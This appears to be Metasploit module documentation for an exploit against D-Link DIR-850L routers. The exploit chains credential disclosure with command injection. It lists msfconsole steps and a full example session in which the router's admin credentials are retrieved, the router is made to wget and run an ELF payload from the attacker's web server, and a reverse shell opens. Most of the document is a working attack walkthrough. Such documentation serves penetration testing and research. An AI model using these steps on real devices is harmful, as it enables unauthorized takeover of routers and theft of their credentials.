The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop. ## Vulnerable Application 1. Start msfconsole 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` 3. Do : `set RHOST [RouterIP]` 4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp` 5. Do : `run` 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session ## Example ``` msf > use exploit/linux/http/dlink_dir850l_unauth_exec msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14 RHOST => 192.168.0.14 msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80 RPORT => 80 msf exploit(dlink_dir850l_unauth_exec) > check [*] 192.168.0.14:80 The target service is running, but could not be validated. msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true VERBOSE => true msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3 LHOST => ens3 msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131 LPORT => 3131 msf exploit(dlink_dir850l_unauth_exec) > run [*] Started reverse TCP handler on 192.168.0.11:3131 [*] 192.168.0.14:80 - Connecting to target... [+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535 [+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm [*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm [*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm [*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm [*] 192.168.0.14:80 - Waiting for target to request the ELF payload... [*] 192.168.0.14:80 - Sending payload to the server... [*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm [*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm [*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us... [*] Sending stage (84 bytes) to 192.168.0.14 [*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400 [+] Deleted /tmp/uoskutcy [-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? [*] Server stopped. [*] Exploit completed, but no session was created. msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1 [*] Starting interaction with 1... 190745749 wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj true pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY pwd / ```